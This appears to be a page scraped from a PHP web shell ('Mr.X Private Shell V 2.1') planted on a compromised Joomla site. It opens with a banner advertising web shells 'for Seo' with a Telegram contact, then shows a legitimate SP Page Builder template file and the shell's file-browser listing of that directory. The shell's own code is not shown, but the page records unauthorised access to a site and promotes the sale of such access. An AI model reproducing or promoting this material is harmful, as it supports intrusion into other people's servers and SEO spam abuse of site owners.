__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package SP Page Builder
* @author JoomShaper http://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2022 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('restricted aceess');
use Joomla\CMS\Factory;
$options = $displayData['options'];
$custom_class = (isset($options->class)) ? ' ' . $options->class : '';
$data_attr = '';
$doc = Factory::getDocument();
// Responsive
if(isset($options->sm_col) && $options->sm_col) {
$options->cssClassName .= ' sppb-' . $options->sm_col;
}
if(isset($options->xs_col) && $options->xs_col) {
$options->cssClassName .= ' sppb-' . $options->xs_col;
}
// Visibility
if(isset($options->hidden_md) && $options->hidden_md) {
$custom_class .= ' sppb-hidden-md sppb-hidden-lg';
}
if(isset($options->hidden_sm) && $options->hidden_sm) {
$custom_class .= ' sppb-hidden-sm';
}
if(isset($options->hidden_xs) && $options->hidden_xs) {
$custom_class .= ' sppb-hidden-xs';
}
if(isset($options->items_align_center) && $options->items_align_center) {
$custom_class .= ' sppb-align-items-center';
}
// Animation
if(isset($options->animation) && $options->animation) {
$custom_class .= ' sppb-wow ' . $options->animation;
if(isset($options->animationduration) && $options->animationduration) {
$data_attr .= ' data-sppb-wow-duration="' . $options->animationduration . 'ms"';
}
if(isset($options->animationdelay) && $options->animationdelay) {
$data_attr .= ' data-sppb-wow-delay="' . $options->animationdelay . 'ms"';
}
}
$html = '';
$html .= '<div class="sppb-' . $options->cssClassName . '">';
$html .= '<div id="column-id-'. $options->dynamicId .'" class="sppb-column' . $custom_class . '" ' . $data_attr . '>';
if (isset($options->background_image) && $options->background_image) {
if (isset($options->overlay) && $options->overlay) {
$html .= '<div class="sppb-column-overlay"></div>';
}
}
$html .= '<div class="sppb-column-addons">';
echo $html;
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| css.php | File | 4.93 KB | 0664 |
|
| end.php | File | 350 B | 0664 |
|
| start.php | File | 1.96 KB | 0664 |
|